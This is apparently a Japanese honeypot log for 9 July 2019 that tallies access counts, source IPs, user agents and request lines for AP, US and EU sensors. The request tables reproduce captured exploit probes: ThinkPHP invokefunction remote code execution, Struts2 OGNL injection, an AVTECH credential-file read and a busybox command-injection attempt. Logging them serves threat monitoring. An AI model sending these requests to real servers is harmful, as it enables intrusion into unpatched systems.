ハニーポット(仮) 観測記録 2019/07/09分です。
APでは
AVTECHの脆弱性を狙うアクセス
を確認しました。
USでは
ThinkPHPの脆弱性を狙うアクセス
を確認しました。
EUでは
Struts2の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
を確認しました。
アクセス数推移
AP:総アクセス数:33 (前日比:-58)
US:総アクセス数:20 (前日比:-103)
EU:総アクセス数:37 (前日比:+21)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 3 | 101.249.52.167 | China |
| 1 | 110.249.212.46 | China |
| 1 | 110.80.25.2 | China |
| 1 | 110.80.25.6 | China |
| 1 | 110.80.25.7 | China |
| 4 | 123.157.192.240 | China |
| 3 | 130.61.18.166 | Germany |
| 1 | 182.138.162.114 | China |
| 1 | 188.165.5.15 | Ireland |
| 1 | 198.100.145.189 | Canada |
| 3 | 5.188.210.101 | Russia |
| 1 | 54.36.148.20 | France |
| 1 | 54.36.148.59 | France |
| 2 | 60.191.52.254 | China |
| 1 | 66.240.205.34 | United States |
| 1 | 66.249.79.65 | United States |
| 3 | 77.247.108.132 | Iceland |
| 3 | 77.247.110.219 | Netherlands |
| 1 | 94.102.49.193 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 16 | - |
| 2 | Go-http-client/1.1 |
| 1 | Mozilla/5.01717655 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 |
| 2 | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/) |
| 1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
| 3 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 4 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /cgi-bin/nobody/Machine.cgi?action=get_capability | HTTP/1.1 |
| 1 | GET | /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* | HTTP/1.1 |
| 1 | GET | /current_config/passwd | HTTP/1.1 |
| 1 | GET | /currentsetting.htm | HTTP/1.1 |
| 1 | GET | /device_description.xml | HTTP/1.1 |
| 2 | GET | /echo.php | HTTP/1.1 |
| 1 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
| 1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
| 1 | GET | /login/login.html | HTTP/1.1 |
| 4 | GET | /robots.txt | HTTP/1.1 |
| 2 | GET | /TP/index.php | HTTP/1.1 |
| 2 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /winbox.png | HTTP/1.1 |
| 2 | GET | /wp-login.php | HTTP/1.1 |
| 1 | Gh0st\xad | ||
| 1 | HEAD | / | HTTP/1.1 |
| 1 | HEAD | http://112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
| 1 | HEAD | http://123[.]125[.]114[.]144/ | HTTP/1.1 |
| 2 | HEAD | /robots.txt | HTTP/1.0 |
| 4 | HEAD | /robots.txt | HTTP/1.1 |
| 2 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
Region:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 110.249.212.46 | China |
| 1 | 178.33.38.55 | Germany |
| 1 | 185.156.177.20 | Russia |
| 2 | 194.28.112.50 | Netherlands |
| 10 | 202.108.2.50 | China |
| 1 | 2.235.243.38 | Italy |
| 1 | 5.188.210.101 | Russia |
| 1 | 60.191.52.254 | China |
| 1 | 77.247.108.132 | Iceland |
| 1 | 77.247.110.219 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 6 | - |
| 1 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
| 1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /webadmin/script?command= | busybox|HTTP/1.1 |
| 1 | GET | /wp-login.php | HTTP/1.1 |
| 1 | HEAD | http://112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
| 2 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
| 3 | \x03 |
Region:EU
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 10 | 101.37.152.150 | China |
| 6 | 110.249.212.46 | China |
| 2 | 116.62.166.156 | China |
| 1 | 185.156.177.20 | Russia |
| 2 | 194.28.112.50 | Netherlands |
| 13 | 218.4.90.211 | China |
| 2 | 77.247.108.132 | Iceland |
| 1 | 77.247.110.219 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 12 | - |
| 1 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 12 | python-requests/2.12.4 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest | HTTP/1.1 |
| 1 | GET | /default.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 6 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
| 1 | GET | /index.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest | HTTP/1.1 |
| 1 | GET | /index.action | HTTP/1.1 |
| 1 | GET | /index.do?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest | HTTP/1.1 |
| 1 | GET | /index.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest | HTTP/1.1 |
| 2 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 1 | GET | /login.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest | HTTP/1.1 |
| 1 | GET | /login.do?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest | HTTP/1.1 |
| 1 | GET | /login.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest | HTTP/1.1 |
| 1 | GET | /login/login.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest | HTTP/1.1 |
| 1 | GET | /main.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /register.jsp?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 3 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | POST | /index.action | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
| 3 | \x03 |
